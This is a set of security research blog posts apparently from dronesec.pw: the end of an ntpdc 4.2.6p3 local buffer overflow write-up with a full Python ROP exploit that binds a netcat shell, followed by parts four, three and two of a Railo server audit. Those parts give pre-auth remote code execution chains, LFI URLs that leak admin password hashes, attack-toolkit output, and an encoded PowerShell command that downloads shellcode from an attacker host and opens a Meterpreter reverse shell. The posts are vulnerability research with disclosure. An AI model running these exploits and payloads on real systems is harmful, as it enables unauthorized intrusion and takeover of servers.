0028| 0xbfffefd4 ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x800143ea in ?? ()

As shown above, we’ve got our two values in EDI/ESI and are returning to our ADD EDI, ESI gadget. Once this completes, we return to our CALL EDI gadget, which will jump into system:

EDI: 0x366060 (<system>:   sub    esp,0x1c)
EBP: 0x41414141 ('AAAA')
ESP: 0xbfffefc0 --> 0xbffff60d ("/bin/nc -lp 5544 -e /bin/sh")
EIP: 0x80022073 --> 0xd7ff
EFLAGS: 0x217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0x80022073: call   edi

Recall the format of a ret2libc: [system() address | exit() | shell command]; therefore, we need to stick a bogus exit address (in my case, junk) as well as the address of a command. Also remember, however, that CALL EDI is essentially a macro for PUSH EIP+2 ; JMP EDI. This means that our stack will be tainted with the address @ EIP+2. Thanks to this, we don’t really need to add an exit address, as one will be added for us. There are, unfortunately, no JMP EDI gadgets in the binary, so we’re stuck with a messy exit.

This culminates in:

$ export LD_PRELOAD=`python -c 'print "A"*8472 + "\xff\xff\xff\xee" + "\x61\x60\x36\x11" + "AAAA" + "\xf2\x38\x01\x80" + "\x73\x20\x02\x80" + "\x0d\xf6\xff\xbf" + "C"*1492'`
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
[snip all the LD_PRELOAD crap]
[New process 31184]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
process 31184 is executing new program: /bin/dash
[New process 31185]
process 31185 is executing new program: /bin/nc.traditional

Success! Though this is a very dirty hack, and makes no claim of portability, it works. As noted previously, we can brute force the image base and stack offsets, though we can also execute the binary with an empty environment and no stack tampering with env -i, giving us a much higher chance of hitting our mark.

Overall, this was quite a bit of fun. Although ASLR/PIE still poses an issue, this is a local bug that brute forcing and a little investigation can’t take care of. NX/RELRO/Canary/SSP/ASCII Armor have all been successfully neutralized. I hacked up a PoC that should work on Ubuntu boxes as configured, but it brute forces offsets. Test runs show it can take up to 2 hours to successfully pop a box. Full code can be found below.

from os import system, environ
from struct import pack
import sys

#
# ntpdc 4.2.6p3 bof
# @dronesec
# tested on x86 Ubuntu 12.04.5 LTS
#

IMAGE_BASE = 0x80000000
LD_INITIAL_OFFSET = 8900
LD_TAIL_OFFSET = 1400

sploit = "\x41" * 485        # junk 
sploit += pack("<I", IMAGE_BASE + 0x000143e0) # eip
sploit += "\x41" * 79        # junk 
sploit += pack("<I", IMAGE_BASE + 0x0002678d) # location -0x14/-0x318 from shellcode

ld_pl = ""
ld_pl += pack("<I", 0xeeffffff) # ESI
ld_pl += pack("<I", 0x11366061) # EDI
ld_pl += pack("<I", 0x41414141) # EBP
ld_pl += pack("<I", IMAGE_BASE + 0x000138f2) # ADD EDI, ESI; RET
ld_pl += pack("<I", IMAGE_BASE + 0x00022073) # CALL EDI
ld_pl += pack("<I", 0xbffff60d) # payload addr based on empty env; probably wrong

environ["EGG"] = "/bin/nc -lp 5544 -e /bin/sh"

for idx in xrange(200):

    for inc in xrange(200):

        ld_pl = ld_pl + "\x41" * (LD_INITIAL_OFFSET + idx)
        ld_pl += "\x43" * (LD_INITIAL_OFFSET + inc)

        environ["LD_PRELOAD"] = ld_pl
        system("echo %s | ntpdc 2>&1" % sploit)

http://dronesec.pw/
railo security - part four - pre-auth remote code executionBryan Alexander
27 August 2014 at 21:00

railo security - part four - pre-auth remote code execution

http://dronesec.pw/

By: Bryan Alexander

27 August 2014 at 21:00

Part one – intro
Part two – post-auth rce
Part three – pre-auth password retrieval
Part four – pre-auth remote code execution

This post concludes our deep dive into the Railo application server by detailing not only one, but two pre-auth remote code execution vulnerabilities. If you’ve skipped the first three parts of this blog post to get to the juicy stuff, I don’t blame you, but I do recommend going back and reading them; there’s some important information and details back there. In this post, we’ll be documenting both vulnerabilities from start to finish, along with some demonstrations and notes on clusterd’s implementation on one of these.

The first RCE vulnerability affects versions 4.1 and 4.2.x of Railo, 4.2.1 being the latest release. Our vulnerability begins with the file thumbnail.cfm, which Railo uses to store admin thumbnails as static content on the server. As previously noted, Railo relies on authentication measures via the cfadmin tag, and thus none of the cfm files actually contain authentication routines themselves.

thumbnail.cfm first generates a hash of the image along with it’s width and height:

1
2
3

<cfset url.img=trim(url.img)>
<cfset id=hash(url.img&"-"&url.width&"-"&url.height)>
<cfset mimetypes={png:'png',gif:'gif',jpg:'jpeg'}>

Once it’s got a hash, it checks if the file exists, and if not, attempts to read and write it down:

<cffile action="readbinary" file="#url.img#" variable="data">
<cfimage action="read" source="#data#" name="img">

<!--- shrink images if needed --->
<cfif img.height GT url.height or img.width GT url.width>
    <cfif img.height GT url.height >
        <cfimage action="resize" source="#img#" height="#url.height#" name="img">
    </cfif>
    <cfif img.width GT url.width>
        <cfimage action="resize" source="#img#" width="#url.width#" name="img">
    </cfif>
    <cfset data=toBinary(img)>
</cfif>

The cffile tag is used to read the raw image and then cast it via the cfimage tag. The wonderful thing about cffile is that we can provide URLs that it will arbitrarily retrieve. So, our URL can be this:

1	`192.168.1.219:8888/railo-context/admin/thumbnail.cfm?img=http://192.168.1.97:8000/my_image.png&width=5000&height=50000`

And Railo will go and fetch the image and cast it. Note that if a height and width are not provided it will attempt to resize it; we don’t want this, and thus we provide large width and height values. This file is written out to /railo/temp/admin-ext-thumbnails/[HASH].[EXTENSION].

We’ve now successfully written a file onto the remote system, and need a way to retrieve it. The temp folder is not accessible from the web root, so we need some sort of LFI to fetch it. Enter jsloader.cfc.

jsloader.cfc is a Railo component used to fetch and load Javascript files. In this file is a CF tag called get, which accepts a single argument lib, which the tag will read and return. We can use this to fetch arbitrary Javascript files on the system and load them onto the page. Note that it MUST be a Javascript file, as the extension is hard-coded into the file and null bytes don’t work here, like they would in PHP. Here’s the relevant code:

<cfset var filePath = expandPath('js/#arguments.lib#.js')/>
    <cfset var local = {result=""} /><cfcontent type="text/javascript">
        <cfsavecontent variable="local.result">
            <cfif fileExists(filePath)>
                <cfinclude template="js/#arguments.lib#.js"/>
            </cfif>
        </cfsavecontent>
    <cfreturn local.result />

Let’s tie all this together. Using thumbnail.cfm, we can write well-formed images to the file system, and using the jsloader.cfc file, we can read arbitrary Javascript. Recall how log injection works with PHP; we can inject PHP tags into arbitrary files so long as the file is loaded by PHP, and parsed accordingly. We can fill a file full of junk, but if the parser has its way a single <?phpinfo();?> will be discovered and executed; the CFML engine works the same way.

Our attack becomes much more clear: we generate a well-formed PNG file, embed CFML code into the image (metadata), set the extension to .js, and write it via thumbnail.cfm. We then retrieve the file via jsloader.cfc and, because we’re loading it with a CFM file, it will be parsed and executed. Let’s check this out:

$ ./clusterd.py -i 192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer jsload

        clusterd/0.3.1 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-06-15 03:39PM] Started at 2014-06-15 03:39PM
 [2014-06-15 03:39PM] Servers' OS hinted at windows
 [2014-06-15 03:39PM] Fingerprinting host '192.168.1.219'
 [2014-06-15 03:39PM] Server hinted at 'railo'
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Server...
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Server Administrator...
 [2014-06-15 03:39PM] Checking railo version 4.1 Railo Web Administrator...
 [2014-06-15 03:39PM] Matched 2 fingerprints for service railo
 [2014-06-15 03:39PM]   Railo Server Administrator (version 4.1)
 [2014-06-15 03:39PM]   Railo Web Administrator (version 4.1)
 [2014-06-15 03:39PM] Fingerprinting completed.
 [2014-06-15 03:39PM] This deployer (jsload_lfi) requires an external listening port (8000).  Continue? [Y/n] > 
 [2014-06-15 03:39PM] Preparing to deploy cmd.cfml...
 [2014-06-15 03:40PM] Waiting for remote server to download file [5s]]
 [2014-06-15 03:40PM] Invoking stager and deploying payload...
 [2014-06-15 03:40PM] Waiting for remote server to download file [7s]]
 [2014-06-15 03:40PM] cmd.cfml deployed at /railo-context/cmd.cfml
 [2014-06-15 03:40PM] Finished at 2014-06-15 03:40PM

A couple things to note; as you may notice, the module currently requires the Railo server to connect back twice. Once is for the image with embedded CFML, and the second for the payload. We embed only a stager in the image that then connects back for the actual payload.

Sadly, the LFI was unknowingly killed in 4.2.1 with the following fix to jsloader.cfc:

<cfif arguments.lib CT "..">
    <cfheader statuscode="400">
    <cfreturn "// 400 - Bad Request">
</cfif>

The arguments.lib variable contains our controllable path, but it kills our ability to traverse out. Unfortunately, we can’t substitute the .. with unicode or utf-16 due to the way Jetty and Java are configured, by default. This file is pretty much useless to us now, unless we can write into the folder that jsloader.cfc reads from; then we don’t need to traverse out at all.

We can still pop this on Express installs, due to the Jetty LFI discussed in part 3. By simply traversing into the extensions folder, we can load up the Javascript file and execute our shell. Railo installs still prove elusive.

buuuuuuuuuuuuuuuuuuuuuuuuut

Recall the img.cfm LFI from part 3; by tip-toeing back into the admin-ext-thumbnails folder, we can summon our vulnerable image and execute whatever coldfusion we shove into it. This proves to be an even better choice than jsloader.cfc, as we don’t need to traverse as far. This bug only affects versions 4.1 – 4.2.1, as thumbnail.cfm wasn’t added until 4.1. CVE-2014-5468 has been assigned to this issue.

The second RCE vulnerability is a bit easier and has a larger attack vector, spanning all versions of Railo. As previously noted, Railo does not do per page/URL authentication, but rather enforces it when making changes via the <cfadmin> tag. Due to this, any pages doing naughty things without checking with the tag may be exploitable, as previously seen. Another such file is overview.uploadNewLangFile.cfm:

<cfif structKeyExists(form, "newLangFile")>
    <cftry>
        <cffile action="UPLOAD" filefield="form.newLangFile" destination="#expandPath('resources/language/')#" nameconflict="ERROR">
        <cfcatch>
            <cfthrow message="#stText.overview.langAlreadyExists#">
        </cfcatch>
    </cftry>
    <cfset sFile = expandPath("resources/language/" & cffile.serverfile)>
    <cffile action="READ" file="#sFile#" variable="sContent">
    <cftry>
        <cfset sXML     = XMLParse(sContent)>
        <cfset sLang    = sXML.language.XMLAttributes.label>
        <cfset stInLang = GetFromXMLNode(sXML.XMLRoot.XMLChildren)>
        <cfcatch>
            <cfthrow message="#stText.overview.ErrorWhileReadingLangFile#">
        </cfcatch>
    </cftry>

I mean, this might as well be an upload form to write arbitrary files. It’s stupid simple to get arbitrary data written to the system:

POST /railo-context/admin/overview.uploadNewLangFile.cfm HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/railo-context/admin/server.cfm
Connection: keep-alive
Content-Type: multipart/form-data; boundary=AaB03x
Content-Length: 140

--AaB03x
Content-Disposition: form-data; name="newLangFile"; filename="xxxxxxxxx.lang"
Content-Type: text/plain

thisisatest
--AaB03x--

The tricky bit is where it’s written to; Railo uses a compression system that dynamically generates compressed versions of the web server, contained within railo-context.ra. A mirror of these can be found under the following:

1	`[ROOT]\webapps\ROOT\WEB-INF\railo\temp\compress`

The compressed data is then obfuscated behind two more folders, both MD5s. In my example, it becomes:

1	`[ROOT]\webapps\ROOT\WEB-INF\railo\temp\compress\88d817d1b3c2c6d65e50308ef88e579c\0bdbf4d66d61a71378f032ce338258f2`

So we cannot simply traverse into this path, as the hashes change every single time a file is added, removed, or modified. I’ll walk the logic used to generate these, but as a precusor, we aren’t going to figure these out without some other fashionable info disclosure bug.

The hashes are calculated in railo-java/railo-core/src/railo/commons/io/res/type/compress/Compress.java:

temp=temp.getRealResource("compress");                
temp=temp.getRealResource(MD5.getDigestAsString(cid+"-"+ffile.getAbsolutePath()));
if(!temp.exists())temp.createDirectory(true);
}
catch(Throwable t){}
}

    if(temp!=null) {
        String name=Caster.toString(actLastMod)+":"+Caster.toString(ffile.length());
        name=MD5.getDigestAsString(name,name);
        root=temp.getRealResource(name);
        if(actLastMod>0 && root.exists()) return;

The first hash is then cid + "-" + ffile.getAbsolutePath(), where cid is the randomly generated ID found in the id file (see part two) and ffile.getAbsolutePath() is the full path to the classes resource. This is doable if we have the XXE, but 4.1+ is inaccessible.

The second hash is actLastMode + ":" + ffile.length(), where actLastMode is the last modified time of the file and ffile.length() is the obvious file length. Again, this is likely not brute forcable without a serious infoleak vulnerability. Hosts <= 4.0 are exploitable, as we can list files with the XXE via the following:

bryan@debdev:~/tools/clusterd$ python http_test_xxe.py 
88d817d1b3c2c6d65e50308ef88e579c

[SNIP - in which we modify the path to include ^]

bryan@debdev:~/tools/clusterd$ python http_test_xxe.py
0bdbf4d66d61a71378f032ce338258f2

[SNIP - in which we modify the path to include ^]

bryan@debdev:~/tools/clusterd$ python http_test_xxe.py
admin
admin_cfc$cf.class
admin_cfm$cf.class
application_cfc$cf.class
application_cfm$cf.class
component_cfc$cf.class
component_dump_cfm450$cf.class
doc
doc_cfm$cf.class
form_cfm$cf.class
gateway
graph_cfm$cf.class
jquery_blockui_js_cfm1012$cf.class
jquery_js_cfm322$cf.class
META-INF
railo_applet_cfm270$cf.class
res
templates
wddx_cfm$cf.class

http_test_xxe.py is just a small hack I wrote to exploit the XXE, in which we eventually obtain both valid hashes. So we can exploit this in versions <= 4.0 Express. Later versions, as far as I can find, have no discernible way of obtaining full RCE without another infoleak or resorting to a slow, loud, painful death of brute forcing two MD5 hashes.

The first RCE is currently available in clusterd dev, and a PR is being made to Metasploit thanks to @BrandonPrry. Hopefully it can be merged shortly.

As we conclude our Railo analysis, lets quickly recap the vulnerabilities discovered during this audit:

Version 4.2:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express) (Up to version 4.2.0)
Version 4.1:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
Version 4.0:
    - Pre-authentication LFI via XXE (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Install/Express)
    - Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
    - Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
Version 3.x:
    - Pre-authentication LFI via `img.cfm` (Install/Express)
    - Pre-authentication LFI via Jetty CVE (Express)
    - Pre-authentication LFI via XXE (Install/Express)
    - Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Express)

This does not include the random XSS bugs or post-authentication issues. At the end of it all, this appears to be a framework with great ideas, but desperately in need of code TLC. Driving forward with a checklist of features may look nice on a README page, but the desolate wasteland of code left behind can be a scary thing. Hopefully the Railo guys take note and spend some serious time evaluating and improving existing code. The bugs found during this series have been disclosed to the developers; here’s to hoping they follow through.

http://dronesec.pw/
railo security - part three - pre-authentication LFIBryan Alexander
23 August 2014 at 21:00

railo security - part three - pre-authentication LFI

http://dronesec.pw/

By: Bryan Alexander

23 August 2014 at 21:00

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication LFI
Part four – pre-authentication rce

This post continues our four part Railo security analysis with three pre-authentication LFI vulnerabilities. These allow anonymous users access to retrieve the administrative plaintext password and login to the server’s administrative interfaces. If you’re unfamiliar with Railo, I recommend at the very least reading part one of this series. The most significant LFI discussed has been implemented as auxiliary modules in clusterd, though they’re pretty trivial to exploit on their own.

We’ll kick this portion off by introducing a pre-authentication LFI vulnerability that affects all versions of Railo Express; if you’re unfamiliar with the Express install, it’s really just a self-contained, no-installation-necessary package that harnesses Jetty to host the service. The flaw actually has nothing to do with Railo itself, but rather in this packaged web server, Jetty. CVE-2007-6672 addresses this issue, but it appears that the Railo folks have not bothered to update this. Via the browser, we can pull the config file, complete with the admin hash, with http://[host]:8888/railo-context/admin/..\..\railo-web.xml.cfm.

A quick run of this in clusterd on Railo 4.0:

$ ./clusterd.py -i 192.168.1.219 -a railo -v4.0 --rl-pw

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-15 06:25PM] Started at 2014-05-15 06:25PM
 [2014-05-15 06:25PM] Servers' OS hinted at windows
 [2014-05-15 06:25PM] Fingerprinting host '192.168.1.219'
 [2014-05-15 06:25PM] Server hinted at 'railo'
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Server...
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Server Administrator...
 [2014-05-15 06:25PM] Checking railo version 4.0 Railo Web Administrator...
 [2014-05-15 06:25PM] Matched 3 fingerprints for service railo
 [2014-05-15 06:25PM]   Railo Server (version 4.0)
 [2014-05-15 06:25PM]   Railo Server Administrator (version 4.0)
 [2014-05-15 06:25PM]   Railo Web Administrator (version 4.0)
 [2014-05-15 06:25PM] Fingerprinting completed.
 [2014-05-15 06:25PM] Attempting to pull password...
 [2014-05-15 06:25PM] Fetched encrypted password, decrypting...
 [2014-05-15 06:25PM] Decrypted password: default
 [2014-05-15 06:25PM] Finished at 2014-05-15 06:25PM

and on the latest release of Railo, 4.2:

$ ./clusterd.py -i 192.168.1.219 -a railo -v4.2 --rl-pw

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-15 06:28PM] Started at 2014-05-15 06:28PM
 [2014-05-15 06:28PM] Servers' OS hinted at windows
 [2014-05-15 06:28PM] Fingerprinting host '192.168.1.219'
 [2014-05-15 06:28PM] Server hinted at 'railo'
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Server...
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Server Administrator...
 [2014-05-15 06:28PM] Checking railo version 4.2 Railo Web Administrator...
 [2014-05-15 06:28PM] Matched 3 fingerprints for service railo
 [2014-05-15 06:28PM]   Railo Server (version 4.2)
 [2014-05-15 06:28PM]   Railo Server Administrator (version 4.2)
 [2014-05-15 06:28PM]   Railo Web Administrator (version 4.2)
 [2014-05-15 06:28PM] Fingerprinting completed.
 [2014-05-15 06:28PM] Attempting to pull password...
 [2014-05-15 06:28PM] Fetched password hash: d34535cb71909c4821babec3396474d35a978948455a3284fd4e1bc9c547f58b
 [2014-05-15 06:28PM] Finished at 2014-05-15 06:28PM

Using this LFI, we can pull the railo-web.xml.cfm file, which contains the administrative password. Notice that 4.2 only dumps a hash, whilst 4.0 dumps a plaintext password. This is because versions <= 4.0 blowfish encrypt the password, and > 4.0 actually hashes it. Here’s the relevant code from Railo (ConfigWebFactory.java):

private static void loadRailoConfig(ConfigServerImpl configServer, ConfigImpl config, Document doc) throws IOException  {
        Element railoConfiguration = doc.getDocumentElement();

        // password
        String hpw=railoConfiguration.getAttribute("pw");
        if(StringUtil.isEmpty(hpw)) {
            // old password type
            String pwEnc = railoConfiguration.getAttribute("password"); // encrypted password (reversable)
            if (!StringUtil.isEmpty(pwEnc)) {
                String pwDec = new BlowfishEasy("tpwisgh").decryptString(pwEnc);
                hpw=hash(pwDec);
            }
        }
        if(!StringUtil.isEmpty(hpw))
            config.setPassword(hpw);
        else if (configServer != null) {
            config.setPassword(configServer.getDefaultPassword());
        }

As above, they actually encrypted the password using a hard-coded symmetric key; this is where versions <= 4.0 stop. In > 4.0, after decryption they hash the password (SHA256) and use it as such. Note that the encryption/decryption is no longer the actual password in > 4.0, so we cannot simply decrypt the value to use and abuse.

Due to the configuration of the web server, we can only pull CFM files; this is fine for the configuration file, but system files prove troublesome…

The second LFI is a trivial XXE that affects versions <= 4.0, and is exploitable out-of-the-box with Metasploit. Unlike the Jetty LFI, this affects all versions of Railo, both installed and express:

Using this we cannot pull railo-web.xml.cfm due to it containing XML headers, and we cannot use the standard OOB methods for retrieving files. Timothy Morgan gave a great talk at OWASP Appsec 2013 that detailed a neat way of abusing Java XML parsers to obtain RCE via XXE. The process is pretty interesting; if you submit a URL with a jar:// protocol handler, the server will download the zip/jar to a temporary location, perform some header parsing, and then delete it. However, if you push the file and leave the connection open, the file will persist. This vector, combined with one of the other LFI’s, could be a reliable pre-authentication RCE, but I was unable to get it working.

The third LFI is just as trivial as the first two, and again stems from the pandemic problem of failing to authenticate at the URL/page level. img.cfm is a file used to, you guessed it, pull images from the system for display. Unfortunately, it fails to sanitize anything:

<cfset path="resources/img/#attributes.src#.cfm">
<cfparam name="application.adminimages" default="#{}#">
<cfif StructKeyExists(application.adminimages,path) and false>
    <cfset str=application.adminimages[path]>
<cfelse>
    <cfsavecontent variable="str" trim><cfinclude template="#path#"></cfsavecontent>
    <cfset application.adminimages[path]=str>
</cfif>

By fetching this page with attributes.src set to another CFM file off elsewhere, we can load the file and execute any tags contained therein. As we’ve done above, lets grab railo-web.xml.cfm; we can do this with the following url: http://host:8888/railo-context/admin/img.cfm?attributes.src=../../../../railo-web.xml&thistag.executionmode=start which simply returns

1	`<?xml version="1.0" encoding="UTF-8"?><railo-configuration pw="d34535cb71909c4821babec3396474d35a978948455a3284fd4e1bc9c547f58b" version="4.2">`

This vulnerability exists in 3.3 – 4.2.1 (latest), and is exploitable out-of-the-box on both Railo installed and Express editions. Though you can only pull CFM files, the configuration file dumps plenty of juicy information. It may also be beneficial for custom tags, plugins, and custom applications that may house other vulnerable/sensitive information hidden away from the URL.

Curiously, at first glance it looks like it may be possible to turn this LFI into an RFI. Unfortunately it’s not quite that simple; if we attempt to access a non-existent file, we see the following:

The error occurred in zip://C:\Documents and Settings\bryan\My Documents\Downloads\railo\railo-express-4.2.1.000-jre-win32\webapps\ROOT\WEB-INF\railo\context\railo-context.ra!/admin/img.cfm: line 29

Notice the zip:// handler. This prevents us from injecting a path to a remote host with any other handler. If, however, the tag looked like this:

1	`<cfinclude>#attributes.src#</cfinclude>`

Then it would have been trivially exploitable via RFI. As it stands, it’s not possible to modify the handler without prior code execution.

To sum up the LFI’s: all versions and all installs are vulnerable via the img.cfm vector. All versions and all express editions are vulnerable via the Jetty LFI. Versions <= 4.0 and all installs are vulnerable to the XXE vector. This gives us reliable LFI in all current versions of Railo.

This concludes our pre-authentication LFI portion of this assessment, which will crescendo with our final post detailing several pre-authentication RCE vulnerabilities. I expect a quick turnaround for part four, and hope to have it out in a few days. Stay tuned!

http://dronesec.pw/
railo security - part two - post-authentication rceBryan Alexander
24 July 2014 at 21:10

railo security - part two - post-authentication rce

http://dronesec.pw/

By: Bryan Alexander

24 July 2014 at 21:10

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication lfi
Part four – pre-authentication rce

This post continues our dive into Railo security, this time introducing several post-authentication RCE vulnerabilities discovered in the platform. As stated in part one of this series, like ColdFusion, there is a task scheduler that allows authenticated users the ability to write local files. Whilst the existence of this feature sets it as the standard way to shell a Railo box, sometimes this may not work. For example, in the event of stringent firewall rules, or irregular file permissions, or you’d just prefer not to make remote connections, the techniques explored in this post will aid you in this manner.

PHP has an interesting, ahem, feature, where it writes out session information to a temporary file located in a designated path (more). If accessible to an attacker, this file can be used to inject PHP data into, via multiple different vectors such as a User-Agent or some function of the application itself. Railo does sort of the same thing for its Web and Server interfaces, except these files are always stored in a predictable location. Unlike PHP however, the name of the file is not simply the session ID, but is rather a quasi-unique value generated using a mixture of pseudo-random and predictable/leaked information. I’ll dive into this here in a bit.

When a change to the interface is made, or a new page bookmark is created, Railo writes this information out to a session file located at /admin/userdata/. The file is then either created, or an existing one is used, and will be named either web-[value].cfm or server-[value].cfm depending on the interface you’re coming in from. It’s important to note the extension on these files; because of the CFM extension, these files will be parsed by the CFML interpreter looking for CF tags, much like PHP will do. A typical request to add a new bookmark is as follows:

1	`GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=server.request HTTP/1.1`

The favorite server.request is then written out to a JSON-encoded array object in the session file, as below:

1	`{'fullscreen':'true','contentwidth':'1267','favorites':{'server.request':''}}`

The next question is then obvious: what if we inject something malicious as a favorite?

GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir" timeout="10" variable="output"></cfexecute><pre>#output#</pre></cfoutput> HTTP/1.1

Our session file will then read:

{'fullscreen':'true','contentwidth':'1267','favorites':{'<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir" timeout="10" variable="output"></cfexecute><pre>##output##</pre></cfoutput>':'','server.charset':''}}

Whilst our injected data is written to the file, astute readers will note the double # around our Coldfusion variable. This is ColdFusion’s way of escaping a number sign, and will therefore not reflect our command output back into the page. To my knowledge, there is no way to obtain shell output without the use of the variable tags.

We have two options for popping this: inject a command to return a shell or inject a web shell that simply writes output to a file that is then accessible from the web root. I’ll start with the easiest of the two, which is injecting a command to return a shell.

I’ll use PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell into the Railo process. Because Railo will also quote our single/double quotes, we need to base64 the Invoke-Expression payload:

GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=%3A%3Ccfoutput%3E%3Ccfexecute%20name%3D%22c%3A%5Cwindows%5Csystem32%5Ccmd.exe%22%20arguments%3D%22%2Fc%20PowerShell.exe%20-Exec%20ByPass%20-Nol%20-Enc%20aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgA2ADoAOAAwADAAMAAvAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkA%22%20timeout%3D%2210%22%20variable%3D%22output%22%3E%3C%2Fcfexecute%3E%3C%2Fcfoutput%3E%27 HTTP/1.1

Once injected, we hit our session page and pop a shell:

payload => windows/meterpreter/reverse_https
LHOST => 192.168.1.6
LPORT => 4444
[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.1.102:50122 Request received for /INITM...
[*] 192.168.1.102:50122 Staging connection for target /INITM received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.102:50122) at 2014-03-24 00:44:20 -0600

meterpreter > getpid
Current pid: 5064
meterpreter > getuid
Server username: bryan-PC\bryan
meterpreter > sysinfo
Computer        : BRYAN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

Because I’m using Powershell, this method won’t work in Windows XP or Linux systems, but it’s trivial to use the next method for that (net user/useradd).

The second method is to simply write out the result of a command into a file and then retrieve it. This can trivially be done with the following:

1	`':<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir > ./webapps/www/WEB-INF/railo/context/output.cfm" timeout="10" variable="output"></cfexecute></cfoutput>'`

Note that we’re writing out to the start of web root and that our output file is a CFM; this is a requirement as the web server won’t serve up flat files or txt’s.

Great, we’ve verfied this works. Now, how to actually figure out what the hell this session file is called? As previously noted, the file is saved as either web-[VALUE].cfm or server-[VALUE].cfm, the prefix coming from the interface you’re accessing it from. I’m going to step through the code used for this, which happens to be a healthy mix of CFML and Java.

We’ll start by identifying the session file on my local Windows XP machine: web-a898c2525c001da402234da94f336d55.cfm. This is stored in www\WEB-INF\railo\context\admin\userdata, of which admin\userdata is accessible from the web root, that is, we can directly access this file by hitting railo-context/admin/userdata/[file] from the browser.

When a favorite it saved, internal.savedata.cfm is invoked and searches through the given list for the function we’re performing:

1
2
3

<cfif listFind("addfavorite,removefavorite", url.action2) and structKeyExists(url, "favorite")>
    <cfset application.adminfunctions[url.action2](url.favorite) />
        <cflocation url="?action=#url.favorite#" addtoken="no" />

This calls down into application.adminfunctions with the specified action and favorite-to-save. Our addfavorite function is as follows:

<cffunction name="addfavorite" returntype="void" output="no">
        <cfargument name="action" type="string" required="yes" />
        <cfset var data = getfavorites() />
        <cfset data[arguments.action] = "" />
        <cfset setdata('favorites', data) />
    </cffunction>

Tunneling yet deeper into the rabbit hole, we move forwards into setdata:

<cffunction name="setdata" returntype="void" output="no">
        <cfargument name="key" type="string" required="yes" />
        <cfargument name="value" type="any" required="yes" />
        <cflock name="setdata_admin" timeout="1" throwontimeout="no">
            <cfset var data = loadData() />
            <cfset data[arguments.key] = arguments.value />
            <cfset writeData() />
        </cflock>
    </cffunction>

This function actually reads in our data file, inserts our new favorite into the data array, and writes it back down. Our question is “how do you know the file?”, so naturally we need to head into loadData:

1
2
3

 <cffunction name="loadData" access="private" output="no" returntype="any">
        <cfset var dataKey = getDataStoreName() />
            [..snip..]

And yet deeper we move, into getDataStoreName:

1
2
3

<cffunction name="getDataStoreName" access="private" output="no" returntype="string">
        <cfreturn "#request.admintype#-#getrailoid()[request.admintype].id#" />
    </cffunction>

At last we’ve reached the apparent event horizon of this XML black hole; we see the return will be of form web-#getrailoid()[web].id#, substituting in web for request.admintype.

I’ll skip some of the digging here, but lets fast forward to Admin.java:

 private String getCallerId() throws IOException {
        if(type==TYPE_WEB) {
            return config.getId();
        }

Here we return the ID of the caller (our ID, for reference, is what we’re currently tracking down!), which calls down into config.getId:

   @Override
    public String getId() {
        if(id==null){
            id = getId(getSecurityKey(),getSecurityToken(),false,securityKey);
        }
        return id;
    }

